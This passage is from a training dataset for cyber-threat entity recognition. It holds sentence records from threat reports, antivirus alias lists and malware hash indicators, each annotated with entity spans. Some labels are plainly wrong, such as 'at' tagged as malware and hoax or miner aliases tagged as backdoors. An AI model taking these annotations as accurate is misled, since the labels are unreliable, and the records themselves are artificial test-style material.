"THREAT_ACTOR: campaigns": [[77, 86]], "MALWARE: malware.": [[107, 115]]}, "info": {"id": "cyner2_train_002637", "source": "cyner2_train"}} {"text": "We refer to this group of attackers as Moonlight, after the name the attackers chose for one of their command-and-control domains.", "spans": {"THREAT_ACTOR: group of attackers as Moonlight,": [[17, 49]], "THREAT_ACTOR: attackers": [[69, 78]]}, "info": {"id": "cyner2_train_002639", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Endowerpo Win32.Trojan.WisdomEyes.16070401.9500.9987 Backdoor.Industroyer Win32.Backdoor.Industroyer.F Trojan.Win32.Industroyer.c Trojan.Win32.Industroyer.136704.A Trojan.Industroyer.5 Trojan.Industroyer.Win32.3 Trojan.Industroyer.b Trojan.Win32.Industroyer.c Trojan:Win32/CrashOverride.A Trojan/Win32.Industroyer.R202380 Trojan.Industroyer Trojan.Industroyer!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002640", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: Trojan.Downloader.Delf.RAN Downloader.Delf.Win32.2328 Trojan.Downloader.Delf.RAN W32/Trojan2.JVAP Downloader.MisleadApp Win.Trojan.Adpclient-2 Trojan.Downloader.Delf.RAN Trojan.Win32.Delf.crqcbd Troj.Downloader.W32.Delf.spu!c Trojan.Downloader.Delf.RAN TrojWare.Win32.TrojanDownloader.Murlo.~JH2 Trojan.Downloader.Delf.RAN Trojan.DownLoad.32205 Trojan.Win32.Adpclient Trojan.Downloader.Delf.RAN Trojan/Win32.Xema.C73230 Trojan.Downloader.Delf.RAN Trojan.DL.Delf!ywDF9K4Uqh8 Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002641", "source": "cyner2_train"}} {"text": "The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.", "spans": {"MALWARE: The SLocker family": [[0, 18]], "MALWARE: oldest mobile lock screen and file-encrypting ransomware": [[33, 89]], "ORGANIZATION: enforcement agencies": [[118, 138]]}, "info": {"id": "cyner2_train_002642", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BAT/Runner.AV BehavesLike.Win32.Downloader.hh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002643", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader:MSIL/Faksost.B!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002644", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.Win32.Servu!O Exploit.Win32.Servu.ab Exploit.Win32.Servu.dxeal Exploit.W32.Servu.ab!c Win32.Trojan.Inject.Auto Trojan.Starter.973 Exploit.Servu.Win32.15 Muster.c Trojan:Win32/Cryptrun.A W32/ServU.AB!exploit Trojan[Exploit]/Win32.Servu Trojan.Win32.Exploit.45056[h] Exploit.Win32.Servu.ab Trojan:Win32/Cryptrun.A Muster.c Exploit.Servu Exploit.Servu!ffzFcMCTx/E Exploit.Win32.Servu Exploit.DUB Trj/ServU.GM", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_002645", "source": "cyner2_train"}} {"text": "We analysed the XData code and found two host-based kill-switches one of them is about detecting an antivirus running on an infected machine.", "spans": {"MALWARE: XData code": [[16, 26]], "SYSTEM: antivirus": [[100, 109]], "SYSTEM: infected machine.": [[124, 141]]}, "info": {"id": "cyner2_train_002647", "source": "cyner2_train"}} {"text": "There's no vulnerability involved.", "spans": {}, "info": {"id": "cyner2_train_002648", "source": "cyner2_train"}} {"text": "More recently, we have also seen an increase in activity targeting Ukraine.", "spans": {}, "info": {"id": "cyner2_train_002649", "source": "cyner2_train"}} {"text": "The victims include establishments in the United States, Canada, Europe, Middle East, and Latin America.", "spans": {}, "info": {"id": "cyner2_train_002650", "source": "cyner2_train"}} {"text": "These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states.", "spans": {"SYSTEM: computers": [[98, 107]], "ORGANIZATION: government": [[124, 134]], "ORGANIZATION: civil organizations": [[139, 158]]}, "info": {"id": "cyner2_train_002651", "source": "cyner2_train"}} {"text": "Our findings show that Rocket Kitten is still active, retains a growing level of persistence, and acts ever more aggressively in terms of attack method.", "spans": {"THREAT_ACTOR: Rocket Kitten": [[23, 36]]}, "info": {"id": "cyner2_train_002652", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.StartPage.311296.F Trojan.Senphiv.A W32/MalwareS.ZPG VBDloader.E TROJ_DLOAD.SMT Trojan.Win32.StartPage.fss TrojWare.Win32.Pincav.IAD TROJ_DLOAD.SMT TrojanDownloader:Win32/Senphiv.A Downloader/Win32.VB W32/Risk.QGTQ-7423 Trojan-Downloader.Win32.Senphiv W32/StartPage.CTK!tr Trj/StartPage.DAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_002654", "source": "cyner2_train"}} {"text": "Category: Unit 42 Tags: CVE-2012-0158, Downloader, QuasarRAT, Subaat", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "MALWARE: Downloader, QuasarRAT, Subaat": [[39, 68]]}, "info": {"id": "cyner2_train_002657", "source": "cyner2_train"}} {"text": "Analysis of this malware is presented to provide the computer network defense CND community with indicators of this malware.", "spans": {"MALWARE: malware": [[17, 24]], "ORGANIZATION: computer network defense CND community": [[53, 91]], "MALWARE: malware.": [[116, 124]]}, "info": {"id": "cyner2_train_002659", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.BadJoke!O W32/Cietas.B@MM Win.Joke.Bomov-1 Hoax.Win32.BadJoke.Cierrame Riskware.Win32.Cierrame.hpzm Joke.Win32.Cierrame.A Trojan.Tetas Backdoor.PePatch.Win32.18825 not-virus:Joke.Win32.Cierrame HackTool[Hoax]/Win32.Cierrame Win32.Joke.Cierrame.kcloud Hoax.Win32.BadJoke.Cierrame Win-AppCare/Badjoke.274432 Win32/Cierrame.A Win32.Trojan-psw.Badjoke.Ajbz Hoax.Win32.BadJoke.Cierrame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002660", "source": "cyner2_train"}} {"text": "Operation Armageddon, active since at least mid-2013, exposes a cyber espionage campaign devised to provide a military advantage to Russian leadership by targeting Ukrainian government, law enforcement, and military officials in order to steal information that can provide insight into near term Ukrainian intentions and plans.", "spans": {"THREAT_ACTOR: Operation Armageddon,": [[0, 21]], "MALWARE: at": [[35, 37]], "ORGANIZATION: Russian leadership": [[132, 150]], "ORGANIZATION: Ukrainian government, law enforcement, and military officials": [[164, 225]]}, "info": {"id": "cyner2_train_002661", "source": "cyner2_train"}} {"text": "That method relied on enterprise certificates from Apple—which are costly, since the certificates needed are changed very frequently.", "spans": {"ORGANIZATION: 
Apple—which": [[51, 62]]}, "info": {"id": "cyner2_train_002662", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.316D Trojan/Buzus.yca W32/Trojan2.EHHN Win.Trojan.Buzus-3134 Trojan.Win32.Buzus.bohnlg Trojan.Packed.650 BehavesLike.Win32.Ramnit.tc W32/Trojan.ACNM-2721 Troj.W32.Buzus.yca!c Trojan/Win32.Buzus.C104217 Trojan-PWS.Win32.IMMultiPass Win32/Application.1b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002664", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Application.Alphaeon.4 Win32.Trojan.WisdomEyes.16070401.9500.9952 Trojan.Proxy2.1030 BehavesLike.Win32.AdwareConvertAd.gh Trojan:Win32/Vkhost.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002665", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HaluosysLTU.Trojan Trojan-Spy/W32.ZBot.358400.V Trojan.Buzus.Win32.114137 Trojan/Spy.Zbot.aao Win32.Trojan.WisdomEyes.16070401.9500.9607 Trojan.Win32.Winlock.cqkdnb TrojWare.Win32.Injector.AHSP Trojan.Winlock.8004 TrojanSpy.Zbot.diqw Trojan/Win32.Buzus TrojanDownloader:Win32/Dimegup.A Trojan/Win32.Zbot.R69076 TScope.Malware-Cryptor.SB Win32/Spy.Zbot.AAO TrojanSpy.Zbot!SJBAuE7A31M Trojan.Win32.Ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002666", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Small.aggy Trojan-Downloader.Win32.Small.aggy DLOADER.Trojan TrojanDownloader:Win32/Yellsob.A Trojan.PSW.Win32.GameOL.tbi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002667", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Perseus.MSIL Trojan.Ransomcrypt.AE TR/Samas.orhr Trojan.MSILPerseus.D4B2D Ransom:MSIL/Samas.A Trj/GdSda.A Trojan.MSIL.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002669", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.KryptikCRTD.Win32.11290 
Trojan.Dropper.166 Win32.Trojan.WisdomEyes.16070401.9500.9769 Trojan.Win32.Dapato.enqgpq Win32.Trojan.Kryptik.Pdwn TrojWare.Win32.Spy.Tewgol.A BackDoor.Radmin.150 W32.Trojan.Dropper TR/Fuery.znvrd Dropper/Win32.Dapato.C1935389 Malware-Cryptor.Limpopo Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002670", "source": "cyner2_train"}} {"text": "WithSecure has revealed the latest details of the DUCKTAIL malware operation, which was previously described by Deep Instinct Threat Lab as a strategic threat that was being tested to avoid detection.", "spans": {"ORGANIZATION: WithSecure": [[0, 10]], "MALWARE: the DUCKTAIL malware": [[46, 66]], "ORGANIZATION: Deep Instinct Threat Lab": [[112, 136]], "MALWARE: threat": [[152, 158]]}, "info": {"id": "cyner2_train_002671", "source": "cyner2_train"}} {"text": "Website owners find the classical blog format too restrictive, use the plugin to add custom elements to their posts.", "spans": {}, "info": {"id": "cyner2_train_002673", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.SennaOneMaker!O TROJ_SENNAONEMAKER_0000000.TOMA Win32.Trojan.RSP.b W32/Trojan.FIW Backdoor.SubSeven Win32/RSP.A TROJ_SENNAONEMAKER_0000000.TOMA Win.Trojan.Win-52 Trojan.Win32.SennaOneMaker.dxcclv Backdoor.Win32.HostCtrl.253674 TrojWare.Win32.RSP.A Trojan.MulDrop.8 W32/Trojan.UUJQ-7044 TrojanDropper.Win32.RSP.a TR/Multidropper.A Trojan[Dropper]/Win32.SennaOneMaker Win32.Troj.RSP.a.kcloud Troj.Dropper.W32.SennaOneMaker.lcEu TrojanDropper:Win32/SennaOneMaker.A Dropper/SennaOneMaker.6556 TrojanDropper.SennaOneMaker Trj/Sennaonemaker.B Trojan.DR.SennaOneMaker!laIkEqmRI+A W32/SennaOneMaker.V20!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002674", "source": "cyner2_train"}} {"text": "Further research revealed a connection between these attacks and members of the so-called Gaza Hackers Team. 
We refer to this campaign as Molerats.", "spans": {"THREAT_ACTOR: Gaza Hackers Team.": [[90, 108]], "THREAT_ACTOR: campaign": [[126, 134]], "THREAT_ACTOR: Molerats.": [[138, 147]]}, "info": {"id": "cyner2_train_002675", "source": "cyner2_train"}} {"text": "A backdoor also known as: virus.office.qexvmc.1075", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002676", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/VB.aaa W32/MalwareF.JYOH Spyware.Keylogger Trojan.Win32.VB.butwpn W32.W.VB.aaa!c Win32.Worm-im.Vb.Pbfr W32/Retomo.worm W32/Risk.KAPY-3991 Trojan:Win32/Kxhack.B WORM/VB.aaa Trojan:Win32/Kxhack.B W32/Retomo.worm Worm.VB!zIluMBtcaN8 IM-Worm.Win32.VB W32/Retomo.AAA!worm.im Win32/Worm.cc6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002679", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLT250912NLAJIR.Trojan Rootkit.Win32.TDSS!O Trojan.Fsysna Trojan/TDSS.rhu TSPY_DOWNLOADER_BK220264.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TSPY_DOWNLOADER_BK220264.TOMC Win.Downloader.Pangu-2 Trojan.Win32.Fsysna.epjv Trojan.Win32.TDSS.bkqey Trojan.Win32.Tdss.37888.H Troj.W32.Fsysna!c BackDoor.Tdss.3314 Rootkit.TDSS.Win32.3904 BehavesLike.Win32.Msposer.nh Trojan/DDos.af W32.Malware.Downloader Trojan[Rootkit]/Win32.TDSS Win32.TrojDownloader.wk.kcloud Trojan.Symmi.D1492 Trojan.Win32.Fsysna.epjv TrojanDownloader:Win32/Mypo.A Trojan/Win32.Tdss.C50395 Rootkit.TDSS Win32.Trojan.Fsysna.Hros Rootkit.TDSS!r3YXF8ZrJBY W32/TDSS.RHU!tr.rkit Win32/Trojan.f75", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002681", "source": "cyner2_train"}} {"text": "Instead of ALL American spam recipients receiving the malware, however, only those whose email ends in the country code .us received this malware.", "spans": {"MALWARE: malware,": [[54, 62]], "MALWARE: malware.": [[138, 146]]}, "info": {"id": "cyner2_train_002683", "source": "cyner2_train"}} 
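The records above follow one shape throughout: a "text" field, a "spans" map whose keys are "LABEL: surface text" and whose values are lists of [start, end) character offsets into the text, and an "info" block with the record id. Because every span key carries the surface string, a reader can check each offset pair against the text itself (for example "MALWARE: backdoor" at [2, 10] in "A backdoor also known as: ..."). The script below is an added example, not tooling from the corpus or its authors: it parses JSONL records in this shape, reports spans whose offsets do not reproduce the surface text, groups entities by label, and pulls SHA-256 hashes and Android-style package names out of indicator records like the Exodus one. The half-open offset convention is inferred from the records on this page; the two regexes and the sample records (one copied from the page, the rest constructed, including one with a deliberately wrong offset) are assumptions made for the example.

```python
"""Validate span offsets and extract indicators from CyNER-style JSONL records.

Added example for this page; not part of the cyner2_train corpus or its tooling.
Assumed record shape: {"text": str, "spans": {"LABEL: surface": [[start, end], ...]},
"info": {"id": str, "source": str}} with half-open [start, end) offsets.
"""
import json
import re

# Constructed sample input in the corpus's own shape. The first record is copied
# from the page; the others are made up here, and the third has a bad offset
# on purpose ([0, 8] includes the trailing space) so the validator has something
# to report.
SAMPLE_JSONL = "\n".join([
    json.dumps({"text": "Talos has named this malware KONNI.",
                "spans": {"ORGANIZATION: Talos": [[0, 5]],
                          "MALWARE: malware KONNI.": [[21, 35]]},
                "info": {"id": "cyner2_train_002634", "source": "cyner2_train"}}),
    json.dumps({"text": "A backdoor also known as: Backdoor.Industroyer "
                        "Trojan:Win32/CrashOverride.A",
                "spans": {"MALWARE: backdoor": [[2, 10]]},
                "info": {"id": "constructed_aliases", "source": "example"}}),
    json.dumps({"text": "LOWBALL abuses the Dropbox cloud storage service "
                        "for command and control CnC.",
                "spans": {"MALWARE: LOWBALL": [[0, 8]]},
                "info": {"id": "constructed_bad_offset", "source": "example"}}),
    json.dumps({"text": "Indicators of Compromise Exodus One "
                        "011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 "
                        "Package Names com.phonecarrier.linecheck it.offertetelefonicheperte",
                "spans": {"MALWARE: Exodus One": [[25, 35]]},
                "info": {"id": "constructed_ioc", "source": "example"}}),
])

# Assumed indicator patterns: a lowercase 64-hex-digit SHA-256, and a dotted
# all-lowercase identifier for Android package names (AV detection names such
# as Backdoor.Industroyer start with an uppercase letter and are not matched).
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")
PACKAGE_RE = re.compile(r"\b[a-z][a-z0-9_]*(?:\.[a-z][a-z0-9_]*)+\b")


def parse_records(jsonl_text):
    """One JSON object per non-blank line, as in the corpus dump."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def split_key(key):
    """'MALWARE: malware KONNI.' -> ('MALWARE', 'malware KONNI.')."""
    label, _, surface = key.partition(": ")
    return label, surface


def check_spans(record):
    """Return (id, key, start, end, detail) for every offset pair that does not
    reproduce the surface text carried in the span key."""
    text = record["text"]
    rid = record.get("info", {}).get("id")
    problems = []
    for key, offsets in record["spans"].items():
        _, surface = split_key(key)
        for start, end in offsets:
            if not (0 <= start < end <= len(text)):
                problems.append((rid, key, start, end, "out of range"))
            elif text[start:end] != surface:
                problems.append((rid, key, start, end, repr(text[start:end])))
    return problems


def entities(record):
    """Group annotated surface strings by label."""
    grouped = {}
    for key in record["spans"]:
        label, surface = split_key(key)
        grouped.setdefault(label, []).append(surface)
    return grouped


def extract_iocs(record):
    """Pull SHA-256 hashes and package names out of a record's text."""
    text = record["text"]
    return {"sha256": SHA256_RE.findall(text),
            "packages": PACKAGE_RE.findall(text)}


def summarize(jsonl_text):
    """Validate every record and collect indicators across the whole file."""
    records = parse_records(jsonl_text)
    problems = [p for r in records for p in check_spans(r)]
    hashes = sorted({h for r in records for h in extract_iocs(r)["sha256"]})
    packages = sorted({p for r in records for p in extract_iocs(r)["packages"]})
    return {"records": len(records), "problems": problems,
            "sha256": hashes, "packages": packages}


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_JSONL), indent=2))
```

Run against the full dump, the validator is the check to apply before training or evaluating on this corpus; offsets that slice the wrong substring (as in the constructed LOWBALL record, where [0, 8] picks up the trailing space) silently corrupt token labels, and the hash and package lists give a quick way to pull the Exodus and Ginp indicators out of the free-text records without re-annotating them.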
{"text": "A backdoor also known as: W32.WsExplorer.Worm Virus.Win32.VB!O W32/Autorun.worm.h Win32.Trojan.VB.c Infostealer.Gampass Win32/Jampork.D WORM_VB.DVP Virus.Win32.VB.bu Virus.Win32.VB.unsvo Trojan.Win32.PSWIGames.36864.M Virus.VB.Win32.87 WORM_VB.DVP BehavesLike.Win32.VBObfus.cz Trojan/PSW.Jianghu.ei W32/VB.BU Virus/Win32.VB.bu Trojan.Heur.EED21E7 W32.VB.tngk Virus.Win32.VB.bu Worm:Win32/Jampork.A Trojan/Win32.OnlineGameHack.R868 TScope.Trojan.VB W32/VB.ADO Trojan.Win32.VB.mss Virus.Win32.VB.bu W32/VB.BU!tr Win32/Worm.VB.V", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002684", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32/TrojanDownloader.AutoHK.AN BackDoor.Bladabindi.13678 BehavesLike.Win32.Downloader.fc Trojan-Downloader.Win32.Autohk Trojan.Reconyc.eur TR/AD.AhkDldr.tstej Trojan/MSIL.Disfa TrojanDownloader:Win32/AutoHK.A!bit Trojan.Cossta", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002689", "source": "cyner2_train"}} {"text": "This could be an indicator of the massive cyber attack preparation before the National Holidays in Ukraine.", "spans": {"ORGANIZATION: the National Holidays": [[74, 95]]}, "info": {"id": "cyner2_train_002690", "source": "cyner2_train"}} {"text": "Once clicked, an attacker can use the embedded code for various malicious purposes, such as stealing data or installing ransomware on victims' systems.", "spans": {"THREAT_ACTOR: attacker": [[17, 25]], "MALWARE: installing ransomware": [[109, 130]], "SYSTEM: victims' systems.": [[134, 151]]}, "info": {"id": "cyner2_train_002691", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.IRCBot W32.Spybot.Worm Win.Exploit.Fnstenv_mov-1 BehavesLike.Win32.Downloader.mc W32.Hack.Tool EXP/MS06-040.B HackTool:Win32/Lpdexpl.A Backdoor.IRCBot Trj/CI.A Exploit.MS05-017!2vyTKSxF9zk Win32/Trojan.Exploit.8b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002692", "source": "cyner2_train"}} {"text": "Security firm Kaspersky has published a new blog regarding a backdoor that was deployed through the supply chain attack on 3CX, in combination with an info-stealer.", "spans": {"ORGANIZATION: Security firm Kaspersky": [[0, 23]], "MALWARE: backdoor": [[61, 69]], "ORGANIZATION: 3CX,": [[123, 127]], "MALWARE: info-stealer.": [[151, 164]]}, "info": {"id": "cyner2_train_002693", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TisroparLTAAH.Trojan Trojan.Ruandmel Trojan.Heur.FU.E2E781 Win32.Trojan.WisdomEyes.16070401.9500.9922 TROJ_GAUDOX.SM TrojWare.Win32.Ruandmel.AG Trojan.Inject2.57861 TROJ_GAUDOX.SM BehavesLike.Win32.Trojan.kh TrojanDropper.Injector.bkgu Trojan:Win32/Ruandmel.A!bit Trojan/Win32.Dynamer.C1318203 Hoax.Blocker Trojan.MalPack Trojan.Blocker!KJVutD4QUXc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002694", "source": "cyner2_train"}} {"text": "Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python.", "spans": {"MALWARE: SeaDuke": [[10, 17]], "MALWARE: trojan": [[30, 36]], "SYSTEM: Python.": [[87, 94]]}, "info": {"id": "cyner2_train_002695", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.RepakMiner.94720 Trojan.CoinMiner.Win32.220 Trojan/CoinMiner.ej Win32.Trojan.WisdomEyes.16070401.9500.9936 Trojan.Win32.RepakMiner.pgm Trojan.Win32.RepakMiner.csnwjo Win32.Trojan.Repakminer.Pezd Trojan.BtcMine.119 Trojan/RepakMiner.c Trojan/Win32.RepakMiner Trojan:Win32/Tarcloin.G Trojan.Zusy.DEA69 Trojan.Win32.RepakMiner.pgm Trojan/Win32.RepakMiner.C189719 Trojan.RepakMiner Win32/CoinMiner.EJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002696", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.B172C45D Win.Trojan.Autorun-15347 Worm.Win32.AutoRun.cgfw Trojan.Win32.AutoRun.gzlvd Worm.W32.Autorun!c 
Trojan.MulDrop4.47 TROJ_GE.B172C45D BehavesLike.Win32.Dropper.tc Worm.Win32.Honditost Worm/AutoRun.allw Worm/Win32.AutoRun Worm:Win32/Honditost.A Worm.Win32.AutoRun.cgfw Worm.AutoRun Worm.AutoRun!5JHcPe4YmAc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002697", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.P2p.Vance.A Worm.Vance.Win32.2 W32/Vance.a WORM_VANCE.T Win32.Trojan.WisdomEyes.16070401.9500.9978 W32/P2PWorm.DU W32.SillyP2P WORM_VANCE.T Worm.P2p.Vance.A P2P-Worm.Win32.Vance.a Worm.P2p.Vance.A Trojan.Win32.Vance.eofq W32.W.Vance.a!c Worm.P2p.Vance.A Worm.P2p.Vance.A Win32.HLLW.Vance Worm.Win32.Vance W32/P2P_Worm.XQZJ-6276 Worm/Vance.c Worm:Win32/Vance.A WORM/Vance.A Worm[P2P]/Win32.Vance Worm.P2p.Vance.A P2P-Worm.Win32.Vance.a Worm:Win32/Vance.A Worm.P2p.Vance.A Worm.Vance Trj/CI.A Win32/Vance.A Win32.Worm-p2p.Vance.Svrm Worm.P2P.Vance!6yBrY3ioCyI W32/Vance.A!worm.p2p", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002699", "source": "cyner2_train"}} {"text": "The operation is very quick and quiet.", "spans": {}, "info": {"id": "cyner2_train_002700", "source": "cyner2_train"}} {"text": "Bedep was known to be the notorious ad fraud malware and vawtrak is a banking trojan following the success of Zeus.", "spans": {"MALWARE: Bedep": [[0, 5]], "MALWARE: fraud malware": [[39, 52]], "MALWARE: vawtrak": [[57, 64]], "MALWARE: banking trojan": [[70, 84]], "MALWARE: Zeus.": [[110, 115]]}, "info": {"id": "cyner2_train_002702", "source": "cyner2_train"}} {"text": "So far, the malware primarily affects iOS users in mainland China and Taiwan.", "spans": {"MALWARE: malware": [[12, 19]], "ORGANIZATION: iOS users": [[38, 47]]}, "info": {"id": "cyner2_train_002703", "source": "cyner2_train"}} {"text": "A Trojan for Linux that was named Linux.Mirai has several predecessors.", "spans": {"SYSTEM: Linux": [[13, 18]]}, "info": {"id": "cyner2_train_002704", "source": "cyner2_train"}} {"text": "This spambot, 
commonly downloaded by the Andromeda malware, has been observed delivering pharmaceutical industry spam as well as further propagating the main Andromeda bot.", "spans": {"MALWARE: spambot,": [[5, 13]], "MALWARE: Andromeda malware,": [[41, 59]], "ORGANIZATION: pharmaceutical industry": [[89, 112]], "MALWARE: Andromeda bot.": [[158, 172]]}, "info": {"id": "cyner2_train_002705", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Delf!O Backdoor.Delf.Win32.12791 W32/Backdoor.ZRKL-8278 Backdoor.Trojan Trojan.Win32.Delf.iuqg Win32.Backdoor.Delf.Sxnw Trojan.PWS.Banker.26677 Trojan-Spy.Banker W32/Backdoor2.CTBF Backdoor/Delf.hfo Trojan[Backdoor]/Win32.Delf Trojan:Win32/Braba.D Trojan.UserStartup.EB690C Trojan/Win32.Delf.R104794 TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002706", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Downloader.ALJ Pua.Downloader Win32.Trojan.WisdomEyes.16070401.9500.9999 Application.Downloader.ALJ Application.Downloader.ALJ Trojan.Win32.Z.Downloader.179560 Application.Downloader.ALJ BehavesLike.Win32.Downloader.ch Application.Downloader.ALJ Application.Downloader.Alj!c Trj/CI.A Win32/Application.Downloader.dad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002707", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Foreign!O Trojan.Foreign Win32.Trojan.WisdomEyes.16070401.9500.9823 Win32/Ransom.ANJ Ransom_Foreign.R039C0DKF17 Trojan-Ransom.Win32.Foreign.wy Troj.Ransom.W32!c Win32.Trojan.Foreign.Wqdm Trojan.DownLoad2.55226 Trojan.Foreign.Win32.208 Ransom_Foreign.R039C0DKF17 BehavesLike.Win32.Dropper.cc Trojan.Foreign.ays Trojan[Ransom]/Win32.Foreign Trojan.Graftor.D35EB Trojan.Win32.A.Foreign.142848[UPX] Trojan-Ransom.Win32.Foreign.wy Trojan:Win32/Ransirac.A Trojan/Win32.Foreign.R20679 Hoax.Foreign Trojan.Foreign!cDyTfOA7GhM Win32/Trojan.7b3", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_002708", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Trojan.Spy.Eawf BehavesLike.Win32.Trojan.qm W32/Trojan.NEXM-1236 Trojan.MSILKrypt.4 TrojanSpy:MSIL/Fitin.A Trojan.MSIL.Spy Trj/GdSda.A Win32/Trojan.948", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002709", "source": "cyner2_train"}} {"text": "The Scarcruft Group aka APT37, a North Korean APT group, is believed to have been active since 2016 and continues to carry out attacks against institutions and political organizations around the world until 2023.", "spans": {"THREAT_ACTOR: The Scarcruft Group": [[0, 19]], "THREAT_ACTOR: APT37,": [[24, 30]], "THREAT_ACTOR: North Korean APT group,": [[33, 56]], "ORGANIZATION: institutions": [[143, 155]], "ORGANIZATION: political organizations": [[160, 183]]}, "info": {"id": "cyner2_train_002710", "source": "cyner2_train"}} {"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f 26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f 
